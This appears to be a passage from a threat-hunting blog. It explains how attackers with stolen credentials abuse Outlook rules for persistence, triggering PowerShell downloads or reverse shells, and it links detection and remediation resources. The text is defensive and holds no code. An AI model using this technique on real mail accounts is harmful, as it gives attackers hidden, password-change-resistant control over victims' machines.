Another persistence mechanism that may be difficult for hunters to suss out is the use of Outlook rules (see the description from MWR Labs, who also provide a command line tool for creating malicious Outlook rules, which includes a switch to display existing rules).  In short, an actor with valid credentials can access OWA and create an Outlook rule that, when the trigger email is received, can launch a PowerShell script to download and launch an executable, open a reverse shell, or take just about any other action.  Again, this persistence mechanism is completely independent of remediation techniques such as global password changes.

Additional Resources
MS recommendations to detect and remediate Outlook rules
Detecting Outlook rules WRT O365, from TechNet

Addendum, 21 Dec: FireEye blog post references SensePost's free tool for abusing Exchange servers and creating client-side mail rules.

Addendum, 24 Dec: Analysis of LNK file sent in the Cozy Bear campaign